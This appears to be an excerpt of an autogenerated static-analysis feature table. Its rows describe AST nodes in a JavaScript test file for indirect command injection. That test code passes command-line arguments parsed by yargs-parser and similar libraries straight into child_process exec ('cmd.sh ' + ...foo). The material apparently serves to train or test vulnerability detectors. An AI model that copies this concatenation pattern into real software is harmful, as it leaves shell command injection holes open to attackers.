autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:48:82:48 | 2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:48:82:48 | 2 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:48:82:48 | 2 | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:48:82:48 | 2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:48:82:48 | 2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:52:82:54 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:52:82:54 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:52:82:54 | foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:52:82:54 | foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:52:82:54 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:16 | yargsParser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:16 | yargsParser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:16 | yargsParser | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:16 | yargsParser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:16 | yargsParser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:42 | yargsPa ... arser') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:42 | yargsPa ... arser') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:42 | yargsPa ... arser') | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:42 | yargsPa ... arser') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:42 | yargsPa ... arser') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:42 | yargsParser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:42 | yargsParser | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:42 | yargsParser | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:42 | yargsParser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:6:84:42 | yargsParser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:26 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:26 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:26 | require | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:26 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:26 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | exceptional return of require ... arser') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | exceptional return of require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | exceptional return of require ... arser') | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | exceptional return of require ... arser') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | exceptional return of require ... arser') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | require ... arser') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | require ... arser') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | require ... arser') | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | require ... arser') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | require ... arser') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:28:84:41 | 'yargs-parser' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:28:84:41 | 'yargs-parser' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:28:84:41 | 'yargs-parser' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:28:84:41 | 'yargs-parser' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:28:84:41 | 'yargs-parser' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:28:84:41 | 'yargs-parser' | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:28:84:41 | 'yargs-parser' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:28:84:41 | 'yargs-parser' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:3 | cp | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:8 | cp.exec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | cp.exec ... )).foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | cp.exec ... )).foo) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | cp.exec ... )).foo) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | cp.exec ... )).foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | cp.exec ... )).foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | exceptional return of cp.exec ... )).foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | exceptional return of cp.exec ... )).foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | exceptional return of cp.exec ... )).foo) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | exceptional return of cp.exec ... )).foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | exceptional return of cp.exec ... )).foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:5:85:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:5:85:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:5:85:8 | exec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:5:85:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:5:85:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:18 | "cmd.sh " | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- yargsParser().foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:32 | yargsParser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:32 | yargsParser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:32 | yargsParser | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:32 | yargsParser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:32 | yargsParser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | exceptional return of yargsPa ... ice(2)) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | exceptional return of yargsPa ... ice(2)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | exceptional return of yargsPa ... ice(2)) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | exceptional return of yargsPa ... ice(2)) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | exceptional return of yargsPa ... ice(2)) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | yargsPa ... ice(2)) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | yargsPa ... ice(2)) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | yargsPa ... ice(2)) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | yargsPa ... ice(2)) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | yargsPa ... ice(2)) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:59 | yargsPa ... 2)).foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:59 | yargsPa ... 2)).foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:59 | yargsPa ... 2)).foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:59 | yargsPa ... 2)).foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:59 | yargsPa ... 2)).foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:59 | yargsPa ... 2)).foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:40 | process | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:40 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:40 | process | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:40 | process | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:40 | process | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:45 | process.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:45 | process.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:45 | process.argv | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:45 | process.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:45 | process.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:51 | process.argv.slice | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:51 | process.argv.slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:51 | process.argv.slice | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:51 | process.argv.slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:51 | process.argv.slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | exceptional return of process ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | exceptional return of process ... lice(2) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | exceptional return of process ... lice(2) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| 